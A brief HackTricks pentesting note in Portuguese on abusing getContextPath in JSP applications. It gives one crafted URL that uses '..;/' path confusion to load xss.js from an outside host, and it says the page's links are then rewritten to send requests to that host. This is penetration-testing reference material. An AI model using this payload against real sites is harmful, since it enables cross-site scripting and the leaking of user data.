hacktricks/network-services-pentesting/pentesting-web/jsp.md
2023-06-06 18:56:34 +00:00

3.6 KiB

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Abuso de getContextPath

Informações de aqui.

 http://127.0.0.1:8080//rakeshmane.com/xss.js#/..;/..;/contextPathExample/test.jsp

Acessando esse site, você pode alterar todos os links para solicitar informações para rakeshmane.com:

\

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥